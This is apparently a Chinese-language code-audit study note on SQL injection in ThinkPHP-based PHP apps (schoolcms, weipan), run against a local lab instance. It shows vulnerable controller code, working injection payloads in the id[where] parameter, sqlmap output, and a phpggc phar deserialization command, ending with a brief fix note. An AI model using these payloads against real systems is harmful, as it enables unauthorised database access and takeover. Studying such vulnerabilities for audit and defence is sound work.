MVC-PHP代码审计4-框架-SQL注入 #
判断是否是框架:
搜索version THINK_VERSION
判断语法
看文件名
案例一schoolcms-sql注入-版本漏洞 #
新建需要自己看情况自己新建要写入的目录我这里是/Runtime/Cache 创建了就进去了
admin schoolcms 默认密码
点击右边文章发现了
http://localhost:910/index.php?m=Home&c=Article&a=Index&id=6
public function Index()
{
$m = M('Article');
$article = $m->where(array('id'=>I('id'), 'is_enable'=>1))->find();
if(!empty($article['content']))
{
// 访问统计
$m->where(array('id'=>I('id')))->setInc('access_count');
M表示表名字
用了默认的find()方法
const THINK_VERSION = '3.2.3'; 版本如下
在这个版本find是有sql注入漏洞的
id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)–&id[where]=1 结果不行
Application/Admin/Controller/AdminController.class.php 我们换一个文件这里的代码测试
public function SaveInfo()
{
// 登录校验
$this->Is_Login();
// 不是操作自己的情况下
if(I('id') != $this->admin['id'])
{
// 权限校验
$this->Is_Power();
}
// 用户编辑
$id = I('id');
if($id > 0)
http://localhost:910/index.php?m=admin&c=Article&a=SaveInfo&id=6
因为是数字不用引号
http://localhost:910/index.php?m=admin&c=Article&a=SaveInfo&id[where]=6 and sleep(2)# 不用报错因为没开
确实延迟了
使用sqlmap跑
GET /index.php?m=admin&c=Article&a=SaveInfo&id[where]=1* HTTP/1.1
Host: 192.168.1.56:910
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: think_language=en-US; PHPSESSID=36ijnbi7on3o87iu9t7nt9bd9t
python sqlmap.py -r 1234.txt
erun with the '--tamper=between'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 393 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://192.168.1.56:910/index.php?m=admin&c=Article&a=SaveInfo&id[where]=1 AND 3941=3941
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: http://192.168.1.56:910/index.php?m=admin&c=Article&a=SaveInfo&id[where]=1;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.1.56:910/index.php?m=admin&c=Article&a=SaveInfo&id[where]=1 AND (SELECT 2987 FROM (SELECT(SLEEP(5)))YRrr)
---
[10:40:20] [INFO] the back-end DBMS is MySQL
web application technology: ThinkPHP, Apache 2.4.39
back-end DBMS: MySQL >= 5.0.12
[10:40:21] [INFO] fetched data logged to text files under 'C:\Users\22118\AppData\Local\sqlmap\output\192.168.1.56'
[10:40:21] [WARNING] your sqlmap version is outdated
案例二-weipan-后台不安全的sql语法写法 #
index/controller/Goods.php
http://localhost:912/index/Goods/ajaxkdata/tokenpid/1 and 1=1
where(‘pid=’.$pid
(‘uid’,$uid)->find()
$user = Db::name('userinfo')->where('uid',$uid)->find(); 这种是预编译写法使用,来连接
但是在他同一文件发现了.来连接这可能是一个漏洞
public function ajaxkdata()
{
//获取k线图数据,转化为array
$pid = input('param.pid');
$data = Db::name('productdata')->where('pid='.$pid)->find();
$newdata = array();
if($data){
$data['UpdateTime'] = $data['UpdateTime'];
$newdata[0]['price'] = $data['Price'];
$newdata[0]['open'] = $data['Open'];
$newdata[0]['close'] = $data['Close'];
$newdata[0]['lowest'] = $data['Low'];
$newdata[0]['highest'] = $data['High'];
$newdata[0]['time'] = $data['UpdateTime'].'000';
$newdata[0]['fulltime'] = date('Y-m-d H:i:s',$data['UpdateTime']);
$newdata[0]['goodtime'] = date('Y-m-d H:i:s',$data['UpdateTime']);
}
这里版本也有phar漏洞 他版本是5.0.24
./phpggc ThinkPHP/FW1 目标目录 本地文件 -p phar -o test.phar
/index/getdata/mkdirs?dir=phar://test.png
THINKPHP-mysql爆破导致密码泄露-5.0.24 #
在这个源码版本中当对面mysql外连 且开启报错时候可以爆破来看到密码
原因是thinphp里面有一个连接文件 一直连接报错会爆出异常
修复关闭debug 注释掉连接文件代码